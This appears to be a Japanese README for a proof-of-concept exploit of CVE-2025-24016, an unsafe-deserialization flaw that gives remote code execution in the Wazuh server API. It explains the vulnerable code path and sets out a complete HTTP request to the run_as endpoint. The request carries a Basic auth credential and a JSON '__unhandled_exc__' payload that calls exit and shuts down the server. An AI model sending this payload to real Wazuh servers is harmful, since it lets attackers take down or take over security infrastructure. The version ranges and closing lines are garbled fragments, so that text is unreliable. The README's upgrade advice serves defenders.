
CVE-2025-24016: WazuhサーバーにおけるRCE! リモートコード実行
このリポジトリは、wazuh-manager パッケージにおける安全でないデシリアライゼーションによって引き起こされる、Wazuh サーバーでのリモートコード実行 (RCE) 脆弱性を示しています。この脆弱性により、API アクセス権を持つリモート攻撃者 (侵害されたダッシュボード、クラスター内の Wazuh サーバー、または特定の設定で侵害されたエージェント) がサーバー上で任意のコードを実行できる可能性があります。
wazuh-manager バージョン >= 4.4.0>= 4.9.1 でパッチ適用済みこの脆弱性は Wazuh API で発生します。DistributedAPI のパラメーターは JSON としてシリアル化され、framework/wazuh/core/cluster/common.py ファイル内の as_wazuh_object を使用してデシリアル化されます。攻撃者は、サニタイズされていない辞書を DAPI リクエストに注入することでこの脆弱性を悪用する可能性があり、これにより任意の Python コードの評価が発生する恐れがあります。
RCE は run_as エンドポイントを使用してトリガーできます。このエンドポイントにより、攻撃者は auth_context 引数を制御できます。悪意のあるリクエストを作成することで、マスターサーバー上で任意のコードが実行される可能性があります。
サーバー API を使用してこの脆弱性をトリガーするには、以下の手順に従ってください。
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-) です。__unhandled_exc__ が含まれており、これにより任意の Python コード (この場合は exit) の実行がトリガーされます。>= 4.4.0 から 4.9.0 (未パッチ) です。exit 関数がトリガーされ、Wazuh サーバーがシャットダウンします。システムを保護するには、この問題が修正されているバージョン >= 4.9.1 の Wazuh にアップグレードしてください。